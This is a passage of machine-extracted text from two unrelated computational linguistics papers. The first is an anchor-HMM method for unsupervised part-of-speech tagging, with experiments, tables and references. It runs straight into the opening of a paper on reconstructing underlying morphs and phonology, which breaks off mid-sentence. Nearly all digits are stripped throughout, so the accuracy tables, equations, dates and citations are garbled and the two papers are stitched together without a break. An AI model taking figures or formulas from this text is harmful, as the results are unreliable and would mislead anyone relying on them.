vectors of m corresponding to the largest m singular values • if τ = brown: set Ω ← diag (u∞)− bΠ where the projection matrix Π ∈ rn×m is given by Πi,j ∼n( , /m) if τ = random Π = v (diag (u∞)− b) if τ = best-fit Π = diag (u∞)− / v (b) if τ = cca • if τ = brown: compute the transformed emission matrix as f(o) = u(b̃) and set Ω ← diag(v)− f(o) where vx := ||f(o)x|| is the length of the x-th row of f(o). output: Ω ∈ rn×m in proposition . figure : algorithm for constructing a valid Ω with dif- ferent construction methods. for simplicity, we only show the bigram construction (context size l = ), but an extension for larger context (l > ) is straightforward. a trivial convex hull in which every point is a ver- tex. this corresponds to choosing an oracle context yi ∈ rm where [yi]h = { if hi = h otherwise it is possible to recover the brown model param- eters o up to element-wise scaling and rotation of rows using the algorithm of stratos et al. ( ). more specifically, let f(o) ∈ rn×m denote the out- put of their algorithm. then they show that for some vector s ∈ rm with strictly positive entries and an orthogonal matrix q ∈ rm×m: f(o) = o〈 / 〉diag(s)q> where o〈 / 〉 is an element-wise exponentiation of o by / . since the rows of f(o) are simply some scaling and rotation of the rows of o, using Ωx = f(o)x/ ||f(o)x|| yields a valid Ω. while we need to impose an additional assump- tion (the brown model restriction) in order to justify this choice of Ω, we find in our experiments that it performs better than other alternatives. we specu- late that this is because a brown model is rather ap- propriate for the pos tagging task; many words are indeed unambiguous with respect to pos tags (ta- ble ). also, the general effectiveness of f(o) for representational purposes has been demostrated in previous works (stratos et al., ; stratos et al., ). by restricting the a-hmm to be a brown model, we can piggyback on the proven effective- ness of f(o). figure shows an algorithm for constructing Ω with these different construction methods. for sim- plicity, we only show the bigram construction (con- text size l = ), but an extension for larger context (l > ) is straightforward as discussed earlier. the construction methods random (random projection), best-fit (projection to the best-fit subspace), and cca (cca projection) all compute ( ) and differ only in how the dimension is reduced. the construction method brown computes the transformed brown pa- rameters f(o) as the left singular vectors of a scaled covariance matrix and then normalizes its rows. we direct the reader to stratos et al. ( ) for a deriva- tion of this calculation. . . Ω with feature augmentation the x-th row of Ω is a d-dimensional vector repre- sentation of x lying in a convex set with m vertices. this suggests a natural way to incorporate domain- specific features: we can add additional dimensions that provide information about hidden states from the surface form of x. for instance, consider the the pos tagging task. in the simple construction ( ), the representation of word x is defined in terms of neighboring words x′: [Ωx]x′ = e [ ( xi+ = x ′) |xi = x ] where (·) ∈ { , } is the indicator function. we can augment this vector with s additional dimen- sions indicating the spelling features of x. for in- stance, the (n + )-th dimension may be defined as: [Ωx]n+ = e [ (x ends in “ing” ) |xi = x] this value will be generally large for verbs and small for non-verbs, nudging verbs closer together and away from non-verbs. the modified (n + s)- dimensional representation is followed by the usual dimension reduction. note that the spelling features are a deterministic function of a word, and we are implicitly assuming that they are independent of the word given its tag. while this is of course not true in practice, we find that these features can significantly boost the tagging performance. experiments we evaluate our a-hmm learning algorithm on the task of unsupervised pos tagging. the goal of this task is to induce the correct sequence of pos tags (hidden states) given a sequence of words (observa- tion states). the anchor condition corresponds to as- suming that each pos tag has at least one word that occurs only under that tag. . background on unsupervised pos tagging unsupervised pos tagging has long been an active area of research (smith and eisner, a; john- son, ; toutanova and johnson, ; haghighi and klein, ; berg-kirkpatrick et al., ), but results on this task are complicated by vary- ing assumptions and unclear evaluation metrics (christodoulopoulos et al., ). rather than ad- dressing multiple alternatives for evaluating unsu- pervised pos tagging, we focus on a simple and widely used metric: many-to-one accuracy (i.e., we map each hidden state to the most frequently coin- ciding pos tag in the labeled data and compute the resulting accuracy). . . better model v.s. better learning vanilla hmms are notorious for their mediocre performance on this task, and it is well known that they perform poorly largely because of model mis- specification, not because of suboptimal parameter estimation (e.g., because em gets stuck in local op- tima). more generally, a large body of work points to the inappropriateness of simple generative mod- els for unsupervised induction of linguistic structure (merialdo, ; smith and eisner, b; liang and klein, ). consequently, many works focus on using more expressive models such as log-linear models (smith and eisner, a; berg-kirkpatrick et al., ) and markov random fields (mrf) (haghighi and klein, ). these models are shown to deliver good performance even though learning is approxi- mate. thus one may question the value of having a consistent estimator for a-hmms and brown mod- els in this work: if the model is wrong, what is the point of learning it accurately? however, there is also ample evidence that hmms are competitive for unsupervised pos induc- tion when they incorporate domain-specific struc- tures. johnson ( ) is able to outperform the sophisticated mrf model of haghighi and klein ( ) on one-to-one accuracy by using a sparse prior in hmm estimation. the clustering method of brown et al. ( ) which is based on optimizing the likelihood under the brown model (a special case of hmm) remains a baseline difficult to outperform (christodoulopoulos et al., ). we add to this evidence by demonstrating the ef- fectiveness of a-hmms on this task. we also check the anchor assumption on data and show that the a- hmm model structure is in fact appropriate for the problem (table ). . experimental setting we use the universal treebank dataset (version . ) which contains sentences annotated with pos tag types for languages (mcdonald et al., ). all models are trained with hidden states. we use the english portion to experiment with different hy- perparameter configurations. at test time, we fix a configuration (based on the english portion) and ap- ply it across all languages. the list of compared methods is given below: bw the baum-welch algorithm, an em algorithm for hmms (baum and petrie, ). cluster a parameter estimation scheme for hmms based on brown clustering (brown et al., ). we run the brown clustering algorithm to obtain word clusters c . . .c . then we set we use the implementation of liang ( ). the emission parameters o(x|h), transition param- eters t(h′|h), and prior π(h) to be the maximum- likelihood estimates under the fixed clusters. anchor our algorithm learn-anchor-hmm in figure but with the constrained optimization ( ) and ( ) for estimating π and t . anchor-features same as anchor but em- ploys the feature augmentation scheme described in section . . . log-linear the unsupervised log-linear model described in berg-kirkpatrick et al. ( ). instead of emission parameters o(x|h), the model maintains a miniature log-linear model with a weight vector w and a feature function φ. the probability of a word x given tag h is computed as p(x|h) = exp(w >φ(x,h))∑ x∈[n] exp(w >φ(x,h)) the model can be trained by maximizing the like- lihood of observed sequences. we use l-bfgs to directly optimize this objective. this approach ob- tains the current state-of-the-art accuracy on fine- grained ( tags) english wsj dataset. we use maximum marginal decoding for hmm predictions: i.e., at each position, we predict the most likely tag given the entire sentence. . practical issues with the anchor algorithm in our experiments, we find that anchor-nmf (fig- ure ) tends to propose extremely rare words as an- chors. a simple fix is to search for anchors only among relatively frequent words. we find that any reasonable frequency threshold works well; we use the most frequent words. note that this is not a problem if these words include anchor words corresponding to all the tags. we must define the context for constructing Ω. we use the previous and next words (i.e., context size l = ) marked with relative positions. thus Ω has n columns before dimension reduction. table shows the performance on the english portion with different construction methods for Ω. the brown https://github.com/karlstratos/anchor we use the implementation of berg-kirkpatrick et al. ( ) (personal communication). choice of Ω accuracy random . best-fit . cca . brown . table : many-to-one accuracy on the english data with different choices of the convex hull Ω (figure ). these results do not use spelling features. construction (τ = brown in figure ) clearly per- forms the best: essentially, the anchor algorithm is used to extract the hmm parameters from the cca- based word embeddings of stratos et al. ( ). we also explore feature augmentation discussed in section . . . for comparison, we employ the same word features used by berg-kirkpatrick et al. ( ): • indicators for whether a word is capitalized, contains a hyphen, or contains a digit • suffixes of length , , and we weigh the l norm of these extra dimensions in relation to the original dimensions: we find a small weight (e.g., . of the norm of the original dimensions) works well. we also find that these fea- tures can sometimes significantly improve the per- formance. for instance, the accuracy on the english portion can be improved from . % to . % with feature augmentation. another natural experiment is to refine the hmm parameters obtained from the anchor algorithm (or brown clusters) with a few iterations of the baum- welch algorithm. in our experiments, however, it did not significantly improve the tagging perfor- mance, so we omit this result. . tagging accuracy table shows the many-to-one accuracy on all lan- guages in the dataset. for the baum-welch algo- rithm and the unsupervised log-linear models, we report the mean and the standard deviation (in paren- theses) of random restarts run for , itera- tions. both anchor and anchor-features compete favorably. on out of languages, anchor- features achieves the highest accuracy, often model de en es fr id it ja ko pt-br sv bw ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . cluster . . . . . . . . . . anchor . . . . . . . . . . anchor-features . . . . . . . . . . log-linear ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . table : many-to-one accuracy on each language using universal tags. the first four models are hmms estimated with the baum-welch algorithm (bw), the clustering algorithm of brown et al. ( ), the anchor algorithm without (anchor) and with (anchor-features) feature augmentation. log-linear is the model of berg-kirkpatrick et al. ( ) trained with the direct-gradient method using l-bfgs. for bw and log-linear, we report the mean and the standard deviation (in parentheses) of random restarts run for , iterations. closely followed by anchor. the brown clustering estimation is also competitive and has the highest accuracy on languages. not surprisingly, vanilla hmms trained with bw perform the worst (see sec- tion . . for a discussion). log-linear is a robust baseline and performs the best on the remaining languages. it per- forms especially strongly on japanese and korean datasets in which poorly segmented strings such as “ 年 月 日には” (on november , ) and “ . %로” (by . %) abound. in these datasets, it is crucial to make effective use of morphological features. . qualitative analysis . . a-hmm parameters an a-hmm can be easily interpreted since each hidden state is marked with an anchor observation. table shows the anchors found in each lan- guage. note that these anchor words generally have a wide coverage of possible pos tags. we also experimented with using true anchor words (obtained from labeled data), but they did not improve performance over automatically induced anchors. since anchor discovery is inherently tied to parameter estimation, it is better to obtain anchors in a data-driven manner. in particular, certain pos tags (e.g., x) appear quite infrequently, and the model is worse off by being forced to allocate a hidden state for such a tag. table shows words with highest emission prob- abilities o(x|h) under each anchor. we observe that an anchor is representative of a certain group of words. for instance, the state “loss” rep- resents noun-like words, “ ” represents numbers, “on” represents preposition-like words, “one” rep- resents determiner-like words, and “closed” repre- sents verb-like words. the conditional distribution is peaked for anchors that represent function tags (e.g., determiners, punctuation) and flat for anchors that represent content tags (e.g., nouns). occasion- ally, an anchor assigns high probabilities to words that do not seem to belong to the corresponding pos tag. but this is to be expected since o(x|h) ∝ p(xi = x) is generally larger for frequent words. . . model assumptions on data table checks the assumptions in a-hmms and brown models on the universal treebank dataset. the anchor assumption is indeed satisfied with universal tags: in every language, each tag has at least one word uniquely associated with the tag. the brown assumption (each word has exactly one possible tag) is of course not satisfied, since some words are genuinely ambiguous with respect to their pos tags. however, the percentage of unambigu- ous words is very high (well over %). this analy- sis supports that the model assumptions made by a- hmms and brown models are appropriate for pos tagging. table reports the log likelihood (normalized by the number of words) on the english portion of different estimation methods for hmms. bw and cluster obtain higher likelihood than the anchor algorithm, but this is expected given that both em de en es fr id it ja ko pt-br sv empfehlen loss y avait bulan radar お世話に 완전 e och wie hizo commune tetapi però ないと 중에 de bör ; on - le wilayah sulle ことにより 경우 partida grund sein one especie de - - されている。 줄 fazer mellan berlin closed además président bagaimana stati ものを 같아요 meses i und are el qui , lo , 많은 os sociala , take paı́ses ( sama legge した , : . - , la à . al それは 볼 diretor bli der vice españa états dan far- 、 자신의 den im to en unis utara di 幸福の 받고 , , des york de cette pada la ことが 맛있는 uma tid region japan municipio quelques yang art. 通常の 위한 o detta table : anchor words found in each language (model anchor-features). loss year (. ) market (. ) share (. ) company (. ) stock (. ) quarter (. ) shares (. ) price (. ) (. ) (. ) (. ) (. ) (. ) (. ) (. ) (. ) on of (. ) in (. ) . (. ) for (. ) on (. ) by (. ) from (. ) and (. ) one the (. ) a (. ) “ (. ) an (. ) $ (. ) its (. ) that (. ) this (. ) closed said (. ) ’s (. ) is (. ) says (. ) was (. ) has (. ) had (. ) expected (. ) are and (. ) is (. ) are (. ) was (. ) ’s (. ) “ (. ) has (. ) of (. ) take be (. ) % (. ) have (. ) million (. ) but (. ) do (. ) the (. ) make (. ) , , (. ) . (. ) and (. ) ” (. ) % (. ) million (. ) – (. ) that (. ) vice ’s (. ) the (. ) “ (. ) new (. ) and (. ) new (. ) first (. ) chief (. ) to to (. ) . (. ) a (. ) will (. ) $ (. ) n’t (. ) would (. ) % (. ) york the (. ) a (. ) the (. ) of (. ) ’s (. ) million (. ) % (. ) its (. ) japan mr. (. ) it (. ) ” (. ) $ (. ) he (. ) that (. ) which (. ) company (. ) table : most likely words under each anchor word (english model anchor-features). emission probabilities o(x|h) are given in parentheses. and brown clustering directly optimize likelihood. in contrast, the anchor algorithm is based on the method of moments and does not (at least directly) optimize likelihood. note that high likelihood does not imply high accuracy under hmms. related work . latent-variable models there has recently been great progress in estima- tion of models with latent variables. despite the np-hardness in general cases (terwijn, ; arora et al., ), many algorithms with strong theoreti- cal guarantees have emerged under natural assump- tions. for example, for hmms with full-rank condi- tions, hsu et al. ( ) derive a consistent estimator of the marginal distribution of observed sequences. anandkumar et al. ( ) propose an exact tensor decomposition method for learning a wide class of latent variable models with similar non-degeneracy conditions. arora et al. ( ) derive a provably cor- rect learning algorithm for topic models with a cer- tain parameter structure. the anchor-based framework has been originally formulated for learning topic models (arora et al., ). it has been subsequently adopted to learn other models such as latent-variable probabilistic context-free grammars (cohen and collins, ). in our work, we have extended this framework to address unsupervised sequence labeling. zhou et al. ( ) also extend arora et al. ( )’s framework to learn various models includ- ing hmms, but they address a more general prob- lem. consequently, their algorithm draws from anandkumar et al. ( ) and is substantially dif- ferent from ours. . unsupervised pos tagging unsupervised pos tagging is a classic problem in unsupervised learning that has been tackled with various approaches. johnson ( ) observes that de en es fr id it ja ko pt-br sv % anchored tags . . . . . . . . . . % unambig words . . . . . . . . . . . verb pron adp noun adv conj det num adj x prt , said it from mr. n’t or which billion new bono na table : verifying model assumptions on the universal treebank. the anchor assumption is satisfied in every language. the brown assumption (each word has exactly one possible tag) is violated but not by a large margin. the lower table shows the most frequent anchor word and its count under each tag on the english portion. model normalized ll acc bw - . . cluster - . . anchor - . . anchor-features - . . table : log likelihood normalized by the number of words on english (along with accuracy). for bw, we report the mean of random restarts run for , it- erations. em performs poorly in this task because it induces flat distributions; this is not the case with our algo- rithm as seen in the peaky distributions in table . haghighi and klein ( ) assume a set of proto- typical words for each tag and report high accuracy. in contrast, our algorithm automatically finds such prototypes in a subroutine. berg-kirkpatrick et al. ( ) achieve the state- of-the-art result in unsupervised fine-grained pos tagging (mid- %). as described in section . , their model is an hmm in which probabilties are given by log-linear models. table provides a point of reference comparing our work with berg- kirkpatrick et al. ( ) in their setting: models are trained and tested on the entire -tag wsj dataset. their model outperforms our approach in this set- ting: with fine-grained tags, spelling features be- come more important, for instance to distinguish “played” (vbd) from “play” (vbz). nonetheless, we have shown that our approach is competitive when universal tags are used (table ). many past works on pos induction predate the introduction of the universal tagset by petrov et al. ( ) and thus report results with fine-grained tags. more recent works adopt the universal tagset but models accuracy bw . ( . ) cluster . anchor . anchor-features . log-linear . ( . ) table : many-to-one accuracy on the english data with original tags. we use the same setting as in table . for bw and log-linear, we report the mean and the standard deviation (in parentheses) of random restarts run for , iterations. they leverage additional resources. for instance, das and petrov ( ) and täckström et al. ( ) use parallel data to project pos tags from a supervised source language. li et al. ( ) use tag dictionar- ies built from wiktionary. thus their results are not directly comparable to ours. conclusion we have presented an exact estimation method for learning anchor hmms from unlabeled data. there are several directions for future work. an important direction is to extend the method to a richer family of models such as log-linear models or neural net- works. another direction is to further generalize the method to handle a wider class of hmms by relax- ing the anchor condition (condition . ). this will require a significant extension of the nmf algorithm in figure . das and petrov ( ) conduct unsupervised experiments using the model of berg-kirkpatrick et al. ( ), but their dataset and evaluation method differ from ours. acknowledgments we thank taylor berg-kirkpatrick for providing the implementation of berg-kirkpatrick et al. ( ). we also thank anonymous reviewers for their con- structive comments. references animashree anandkumar, daniel hsu, and sham m. kakade. . a method of moments for mixture models and hidden markov models. in twenty-fifth annual conference on learning theory. animashree anandkumar, rong ge, daniel hsu, sham m. kakade, and matus telgarsky. . ten- sor decompositions for learning latent variable models. journal of machine learning research, ( ): – . sanjeev arora, rong ge, and ankur moitra. . learning topic models–going beyond svd. in foun- dations of computer science (focs), ieee rd annual symposium on, pages – . ieee. sanjeev arora, rong ge, yonatan halpern, david mimno, ankur moitra, david sontag, yichen wu, and michael zhu. . a practical algorithm for topic modeling with provable guarantees. in proceedings of the th international conference on machine learn- ing (icml- ), pages – . leonard e. baum and ted petrie. . statisti- cal inference for probabilistic functions of finite state markov chains. the annals of mathematical statis- tics, ( ): – . taylor berg-kirkpatrick, alexandre bouchard-côté, john denero, and dan klein. . painless unsu- pervised learning with features. in human language technologies: the annual conference of the north american chapter of the association for com- putational linguistics, pages – . association for computational linguistics. peter f. brown, peter v. desouza, robert l. mercer, vin- cent j. della pietra, and jenifer c. lai. . class- based n-gram models of natural language. computa- tional linguistics, ( ): – . christos christodoulopoulos, sharon goldwater, and mark steedman. . two decades of unsupervised pos induction: how far have we come? in proceed- ings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. shay b. cohen and michael collins. . a provably correct learning algorithm for latent-variable pcfgs. in proceedings of acl. dipanjan das and slav petrov. . unsupervised part-of-speech tagging with bilingual graph-based pro- jections. in proceedings of the th annual meet- ing of the association for computational linguistics: human language technologies-volume , pages – . association for computational linguistics. marguerite frank and philip wolfe. . an algorithm for quadratic programming. naval research logistics quarterly, ( - ): – . aria haghighi and dan klein. . prototype-driven learning for sequence models. in proceedings of the main conference on human language technol- ogy conference of the north american chapter of the association of computational linguistics, pages – . association for computational linguistics. daniel hsu, sham m. kakade, and tong zhang. . a spectral algorithm for learning hidden markov mod- els. journal of computer and system sciences, ( ): – . mark johnson. . why doesn’t em find good hmm pos-taggers? in emnlp-conll, pages – . shen li, joao v. graça, and ben taskar. . wiki- ly supervised part-of-speech tagging. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – . asso- ciation for computational linguistics. percy liang and dan klein. . analyzing the errors of unsupervised learning. in acl, pages – . percy liang. . semi-supervised learning for natural language. master’s thesis, massachusetts institute of technology. ryan t. mcdonald, joakim nivre, yvonne quirmbach- brundage, yoav goldberg, dipanjan das, kuzman ganchev, keith b. hall, slav petrov, hao zhang, os- car täckström, claudia bedini, núria b. castelló, and jungmee lee. . universal dependency annota- tion for multilingual parsing. in acl, pages – . bernard merialdo. . tagging english text with a probabilistic model. computational linguistics, ( ): – . slav petrov, dipanjan das, and ryan mcdonald. . a universal part-of-speech tagset. in proceedings of the eighth international conference on language re- sources and evaluation (lrec’ ). noah a. smith and jason eisner. a. contrastive estimation: training log-linear models on unlabeled data. in proceedings of the rd annual meeting on association for computational linguistics, pages – . association for computational linguistics. noah a. smith and jason eisner. b. guiding un- supervised grammar induction using contrastive esti- mation. in proc. of ijcai workshop on grammatical inference applications, pages – . karl stratos, do-kyum kim, michael collins, and daniel hsu. . a spectral algorithm for learning class- based n-gram models of natural language. in proceed- ings of the thirtieth conference on uncertainty in arti- ficial intelligence. karl stratos, michael collins, and daniel hsu. . model-based word embeddings from decompositions of count matrices. in proceedings of the rd annual meeting of the association for computational linguis- tics and the th international joint conference on nat- ural language processing (volume : long papers), pages – , beijing, china, july. association for computational linguistics. oscar täckström, dipanjan das, slav petrov, ryan mc- donald, and joakim nivre. . token and type constraints for cross-lingual part-of-speech tagging. transactions of the association for computational linguistics, : – . sebastiaan a. terwijn. . on the learnability of hid- den markov models. in grammatical inference: al- gorithms and applications, pages – . springer. kristina toutanova and mark johnson. . a bayesian lda-based model for semi-supervised part- of-speech tagging. in advances in neural information processing systems, pages – . stephen a. vavasis. . on the complexity of nonneg- ative matrix factorization. siam journal on optimiza- tion, ( ): – . tianyi zhou, jeff a. bilmes, and carlos guestrin. . divide-and-conquer learning by anchoring a conical hull. in advances in neural information processing systems, pages – . modeling word forms using latent underlying morphs and phonology ryan cotterell and nanyun peng and jason eisner department of computer science, johns hopkins university {ryan.cotterell,npeng ,eisner}@jhu.edu abstract the observed pronunciations or spellings of words are often explained as arising from the “underlying forms” of their mor- phemes. these forms are latent strings that linguists try to reconstruct by hand. we propose to reconstruct them automatically at scale, enabling generalization to new words. given some surface word types of a concatenative language along with the abstract morpheme sequences that they ex- press, we show how to recover consistent underlying forms for these morphemes, together with the (stochastic) phonology that maps each concatenation of underly- ing forms to a surface form. our technique involves loopy belief propagation in a nat- ural directed graphical model whose vari- ables are unknown strings and whose con- ditional distributions are encoded as finite- state machines with trainable weights. we define training and evaluation paradigms for the task of surface word prediction, and report results on subsets of languages. introduction how is plurality expressed in english? compar- ing cats ([kæts]), dogs ([dogz]), and quizzes ([kwiziz]), the plural morpheme evidently has at least three pronunciations ([s], [z], [iz]) and at least two spellings (-s and -es). also, consider- ing singular quiz, perhaps the “short exam” mor- pheme has multiple spellings (quizz-, quiz-). fortunately, languages are systematic. the re- alization of a morpheme may vary by context but is largely predictable from context, in a way that generalizes across morphemes. in fact, gener- ative linguists traditionally posit that each mor- pheme of a language has a single representation shared across all contexts (jakobson, ; ken- stowicz and kisseberth, , chapter ). how- ever, this string is a latent variable that is never observed. variation appears when the phonology of the language maps these underlying represen- tations (urs)—in context—to surface represen- tations (srs) that may be easier to pronounce. the phonology is usually described by a grammar that may consist of either rewrite rules (chomsky and halle, ) or ranked constraints (prince and smolensky, ). we will review this framework in section . the upshot is that the observed words in a language are supposed to be explainable in terms of a smaller underlying lexicon of morphemes, plus a phonol- ogy. our goal in this paper is to recover the lexicon and phonology (enabling generalization to new words). this is difficult even when we are told which morphemes are expressed by each word, be- cause the unknown underlying forms of the mor- phemes must cooperate properly with one another and with the unknown phonological rules to pro- duce the observed results. because of these in- teractions, we must reconstruct everything jointly. we regard this as a problem of inference in a di- rected graphical model, as sketched in figure . this is a natural problem for computational lin- guistics. phonology students are trained to puzzle out solutions for small datasets by hand. children apparently solve it at the scale of an entire lan- guage. phonologists would like to have grammars for many languages, not just to study each lan- guage but also to understand universal principles and differences among related languages. auto- matic procedures would recover such grammars. they would also allow comprehensive evaluation and comparison of different phonological theories (i.e., what inductive biases are useful?), and would suggest models of human language learning. solving this problem is also practically impor- tant for nlp. what we recover is a model that can generate and help analyze novel word forms, which abound in morphologically complex lan- guages. our approach is designed to model sur- an analyzer would require a prior over possible analyses. our present model defines just the corresponding likelihoods, i.e., the probability of the observed word given each analysis. rizajgn z eɪʃ#n dæmn rizajgn#eɪʃ#n rizajgn#z dæmn#z dæmn#eɪʃ#n rˌɛ.zɪg.nˈeɪ.ʃ#n ri.zˈajnz dæmz dˌæm.nˈeɪ.ʃ#n rˌɛzɪgnˈeɪʃn̩ rizˈajnz dˈæmz dˌæmnˈeɪʃn̩ ) morpheme urs ) word urs ) word srs concatenation (e.g.) phonology (pfst) phonetics resignation resigns damns damnation m u s ) word observations figure : our model as a bayesian network, in which surface forms arise from applying phonology to a concatenation of underlying forms. shaded nodes show the observed surface forms for four words: resignation, resigns, damns, and damnation. the graphical model encodes their morphological relationships using latent forms. each morpheme ur at layer is generated by the lexicon model mφ (a probabilistic finite-state automaton). these are concatenated into various word urs at layer . each sr at layer is generated using the phonology model sθ (a probabilistic finite-state transducer). layer derives observable phonetic forms from layer . this deletes unpronounced symbols such as syllable boundaries, and translates the phonemes into an observed phonetic, articulatory, or acoustic representation. however, our present paper simply merges layers and : our layer does not currently make use of any unpronounced symbols (e.g., syllable boundaries) and we observe it directly. face pronunciations (as needed for text-to-speech and asr). it might also be applied in practice to model surface spellings (as needed for mt on text). good morphological analysis has been used to improve nlp tasks such as machine translation, parsing, and ner (fraser et al., ; hohensee and bender, ; yeniterzi, ). using loopy belief propagation, this paper at- tacks larger-scale learning problems than prior work on this task (section ). we also develop a new evaluation paradigm that examines how well an inferred grammar predicts held-out srs. un- like previous algorithms, we do not pre-restrict the possible urs for each morpheme to a small or structured finite set, but use weighted finite-state machines to reason about the infinite space of all strings. our graphical model captures the standard assumption that each morpheme has a single ur, unlike some probabilistic learners. however, we do not try to learn traditional ordered rules or con- straint rankings like previous methods. we just search directly for a probabilistic finite-state trans- ducer that captures likely ur-to-sr mappings. formal framework we urge the reader to begin by examining fig- ure , which summarizes our modeling approach through an example. the upcoming sections then give a formal treatment with details and discus- sion. section describes the random variables in figure ’s bayesian network, while section describes its conditional probability distributions. sections – give inference and learning methods. a morpheme is a lexical entry that pairs form with content (saussure, ). its form is a morph—a string of phonemes. its content is a bundle of syntactic and/or semantic properties. note that in this paper, we are nonstandardly us- ing “morph” to denote an underlying form. we assume that all underlying and surface represen- tations can be encoded as strings, over respective alphabets Σu and Σs. this would be possible even for autosegmental representations (kornai, ). a language’s phonological system thus consists of the following components. we denote each im- portant set by a calligraphic letter. we use the cor- responding uppercase letter to denote a function to that set, the corresponding lowercase letter as a variable that ranges over the set’s elements, and a distinguished typeface for specific elements. • a is a set of abstract morphemes such as �qu�i�z and �p�l�u�r$a�l. these are atoms, not strings. • m = Σ∗u is the space of possible morphs: concrete ur strings such as /kwiz/ or /z/. • m : a → m is the lexicon that maps each morpheme a to an underlying morph m = m(a). we will find m(a) for each a. • u = (Σu ∪{#})∗ is the space of underlying representations for words, such as /kwiz#z/. • u : m∗ → u combines morphs. a word is specified by a sequence of morphemes ~a = a ,a , . . ., with concrete forms mi = m(ai). this paper does not deal with the content. however, note that a single morpheme might specify a conjunction or disjunction of multiple properties, leading to morphological phenomena such as fusion, suppletion, or syncretism. that word’s underlying form is then u = u(m ,m , . . .) ∈u. • s = Σ∗s is the space of surface representa- tions for words, such as [kwiziz]. • s : u → s is the phonology. it maps an underlying form u to its surface form s. we will find this function s along with m. we assume in this paper that u simply con- catenates the sequence of morphs, separating them by the morph boundary symbol #: u = u(m ,m , . . .) = m #m # · · · . however, see section . for generalizations. the overall system serves to map an (abstract) morpheme sequence ~a ∈ a∗ to a surface word s ∈ s. crucially, s acts on the underlying form u of the entire word, not one morph at a time. hence its effect on a morph may depend on con- text, as we saw for english pluralization. for ex- ample, s(/kwiz#s/) = [kwiziz]—or if we were to apply our model to orthography, s(/quiz#s/) = [quizzes]. s produces a single well-formed sur- face form, which is not arbitrarily segmented as [quiz-zes] or [quizz-es] or [quizze-s]. probability model our goal is to reconstruct the lexicon m and mor- phophonology s for a given language. we there- fore define prior probability distributions over them. (we assume Σu, Σs,a,u are given.) for each morpheme a ∈ a, we model the morph m(a) ∈m as an iid sample from a proba- bility distribution mφ(m). this model describes what sort of underlying forms appear in the lan- guage’s lexicon. the phonology is probabilistic in a similar way. for a word with underlying form u ∈ u, we pre- sume that the surface form s(u) is a sample from a conditional distribution sθ(s | u). this single sample appears in the lexical entry of the word type and is reused for all tokens of that word. the parameter vectors φ and θ are specific to the language being generated. thus, under our gener- ative story, a language is created as follows: . sample φ and θ from priors (see section . ). . for each a ∈a, sample m(a) ∼ mφ. . whenever a new abstract word~a = a ,a · · · must be pronounced for the first time, con- struct u as described in section , and sample s(u) ∼ sθ(· | u). reuse this s(u) in future. see section . for a generalization to mφ(m | a). note that we have not specified a probability distribution over abstract words ~a, since in this paper, these sequences will always be observed. such a distribution might be influenced by the se- mantic and syntactic content of the morphemes. we would need it to recover the abstract words if they were unobserved, e.g., when analyzing novel word forms or attempting unsupervised training. . discussion: why probability? a language’s lexicon m and morphophonology s are deterministic, in that each morpheme has a sin- gle underlying form and each word has a single surface form. the point of the language-specific distributions mφ and sθ is to aid recovery of these forms by capturing regularities in m and s. in particular, sθ constitutes a theory of the regu- lar phonology of the language. its high-probability sound changes are the “regular” ones, while irreg- ularities and exceptions can be explained as occa- sional lower-probability choices. we prefer a the- ory sθ that has high likelihood, i.e., it assigns high probability (≈ ) to each observed form s given its underlying u. in linguistic terms, we prefer pre- dictive theories that require few exceptions. in the linguistic community, the primary mo- tivation for probabilistic models of phonology (pierrehumbert, ) has been to explain “soft” phenomena: synchronic variation (sankoff, ; boersma and hayes, ) or graded acceptabil- ity judgments on novel surface forms (hayes and wilson, ). these applications are orthog- onal to our motivation, as we do not observe any variation or gradience in our present exper- iments. fundamentally, we use probabilities to measure irregularity—which simply means unpre- dictability and is a matter of degree. our objective function will quantitatively favor explanations that show greater regularity (eisner, b). a probabilistic treatment also allows rela- tively simple learning methods (e.g., boersma and hayes ( )) since inference never has to back- track from a contradiction. our method searches a continuous space of phonologies sθ, all of which are consistent with every mapping s. that is, we always have sθ(s | u) > for all u,s, so our current guess of sθ is always capable of explain- ing the observed words, albeit perhaps with low probability. our em learner tunes sθ (and mφ) so as to raise the probability of the observed sur- face forms, marginalizing over the reconstructed lexicon m of underlying forms. we do warn that w ɛ t ɾw ɛ rə next input character input right context input left context output left context output right context stochastic choice of edit in context c figure : illustration of a contextual edit process as it pro- nounces the english word wetter by transducing the under- lying /wet#@r/ (after erasing #) to the surface [wer@r]. at the point shown, it is applying the “intervocalic alveolar flap- ping” rule, replacing /t/ in this context by applying subst(r). em can get stuck at a local optimum; random restarts and simulated annealing are ways to es- cape such low-likelihood solutions, much as back- tracking escapes zero-likelihood solutions. . mapping urs to srs: the phonology sθ we currently model sθ(s | u) as the probability that a left-to-right stochastic contextual edit pro- cess (figure ) would edit u into s. this probabil- ity is a sum over all edit sequences that produce s from u—that is, all s-to-u alignments. stochastic contextual edit processes were de- scribed by cotterell et al. ( ). such a pro- cess writes surface string s ∈ Σ∗s while reading the underlying string u ∈ Σ∗u . if the process has so far consumed some prefix of the input and pro- duced some prefix of the output, it will next make a stochastic choice among |Σs| + possible ed- its. edits of the form subst(c) or insert(c) (for c ∈ Σs) append c to the output string. edits of the form subst(c) or delete will (also) consume the next input phoneme; if no input phonemes remain, the only possible edits are insert(c) or halt. the stochastic choice of edit, given context, is governed by a conditional log-linear distribution with feature weight vector θ. the feature functions may look at a bounded amount of left and right input context, as well as left output context. our feature functions are described in section . our normalized probabilities sθ(s | u) can be computed by a weighted finite-state transducer, a crucial computational property that we will ex- ploit in section . . as cotterell et al. ( ) explain, the price is that our model is left/right- asymmetric. the inability to condition directly on the right output context arises from local normal- ization, just like “label bias” in maximum entropy markov models (mccallum et al., ). with certain fancier approaches to modeling sθ, which we leave to future work, this effect could be miti- gated while preserving the transducer property. . generating urs: the lexicon model mφ in our present experiments, we use a very simple lexicon model mφ, so that the burden falls on the phonology sθ to account for any language-specific regularities in surface forms. this corresponds to the “richness of the base” principle advocated by some phonologists (prince and smolensky, ), and seems to yield good generalization for us. we say all urs of the same length have the same probability, and the length is geometrically dis- tributed with mean ( /φ) − . this is a -gram model with a single parameter φ ∈ ( , ], namely mφ(m) = (( −φ)/|Σu|)|m| ·φ. it would be straightforward to experiment with other divisions of labor between the lexicon model and phonology model. a -gram model for mφ would also model which 